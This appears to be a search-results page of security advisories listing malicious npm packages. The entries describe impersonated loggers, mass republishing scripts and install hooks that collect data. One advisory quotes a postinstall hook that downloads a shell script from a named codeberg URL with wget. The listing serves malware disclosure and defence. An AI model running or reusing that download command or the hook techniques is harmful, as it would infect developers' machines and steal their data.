1406 matches found
MAL-2026-10566 Malicious code in sight-bind (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 398788014436c7e95df3045f9b32398c3de46b8c9275c0437e44bda1dcb6cc00 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
Malicious code in abuden223 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16b3eb424174fa150faf06029c6808e9bb0e7e235b73c0b9fc8a6fe33e32fa8b The tarball ships auto-publish.sh, a script that republishes the same payload under 100 distinct npm names ishowfeet1-ishowfeet20, nottuff1-nottuff30...
Malicious code in nottuff24 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 98d91c65c2ae847d5e741575bbc60ac69c0d2aca4973888c6ce2fc85daac3e30 The tarball ships auto-publish.sh, a script that republishes the same payload under 100 distinct npm names ishowfeet1-ishowfeet20, nottuff1-nottuff30...
Malicious code in ratelimitsucks3 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5a45b50938677bb4c4bcdeee48af3fd57a8204d48d6aff16a1351ae814491391 The tarball ships auto-publish.sh, a script that republishes the same payload under 100 distinct npm names ishowfeet1-ishowfeet20, nottuff1-nottuff30...
Malicious code in fflc-updated (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c0da486d000821631873ccd6fbb8eac17ee6dc94e8802946ef9d4cd288048e95 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
MAL-2026-6951 Malicious code in whs4_npm (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 47695d571fe82fbb4402e8cc7f56c05e1cb21d0bc8089ccbd8fca32f8cf5a57c The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
Malicious code in notifier-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6a5846e3c26fdded8225d54ec017b01be255353470c39a780bbd9b556c059120 The package presents itself as a pino-compatible logger README, keywords, and a module.exports.pino alias mirror the pino identity, and lib/ replicat...
Malicious code in chai-chain-dom (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f1964693dd7c2bdd9ca7ae20eb441597571b1b78a689bd97648998c6442bda99 Package impersonates the pino logger exports module.exports.pino, README uses pino badge, keywords mimic pino but its actual behavior is a remote cod...
MAL-2026-6923 Malicious code in notifier-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6a5846e3c26fdded8225d54ec017b01be255353470c39a780bbd9b556c059120 The package presents itself as a pino-compatible logger README, keywords, and a module.exports.pino alias mirror the pino identity, and lib/ replicat...
MAL-2026-6678 Malicious code in ts-linting-builder (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c719aef78218f6b59b9f209c41eff610782c86c2ced5aeabe288218ac3c4f880 On npm install, the package's postinstall script test.js invokes routines in index.js that recursively scan the current working directory and the...
Malicious code in @deel-core/client-payroll-onboarding-types (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 3dfba47c3f4cac91620ccf85b9ffb1923927bd4489f5a4710c89e1d693ac2e61 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in vkzmn (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dc2e10775ac70e6f3b083ac0a76374e09e11cac7b06068a4bd3b6114f796a0df package.json declares a postinstall lifecycle hook that runs wget https://codeberg.org/atilalogical/wormteste/raw/branch/main/downprocwork.sh -O d.sh...
MAL-2026-6403 Malicious code in @kl-dolphin/jump (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6b8f3b07b54ef6c2330673267757bff28f45494cbba5f6a71a78115a2a54f10b The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
Malicious code in cursorai-agent (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5a04af62bb8d9774dcd39cbe7f8864477b0813e5e0b19a45ad637e94dd8ae008 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
Malicious code in search-from-search (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 06e2e600c7cba50d7cc3cbff52a18f77e508ec66be3a50cd4960f84771598548 package.json registers node callback.js as both preinstall and postinstall, so the payload runs automatically on npm install. callback.js collects th...
Malicious code in @mastra/voice-elevenlabs (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f99d987467406ef04c81d4437451d8ba5f38649e85437a361470bb9fd94fbe53 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
Malicious code in @mastra/google-cloud-pubsub (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f1bd3f8519d6016a066d4268dae0e9c0d20ca87350cc759832b6053128a5b8d8 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
MAL-2026-6039 Malicious code in @mastra/temporal (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 214be711b41a8883e3252f0e9e41bc902d62da7650334b2efdc7424194989101 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
MAL-2026-5961 Malicious code in @mastra/rag (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 031ec31035fa78e914e64884be3019150c8f1f77b9c464bce74e63cb0cd13227 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...
MAL-2026-5962 Malicious code in @mastra/s3 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 69bd7442a33e88350e5a804e238625a967b16df137b4b1623cd6a0587d25dc21 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...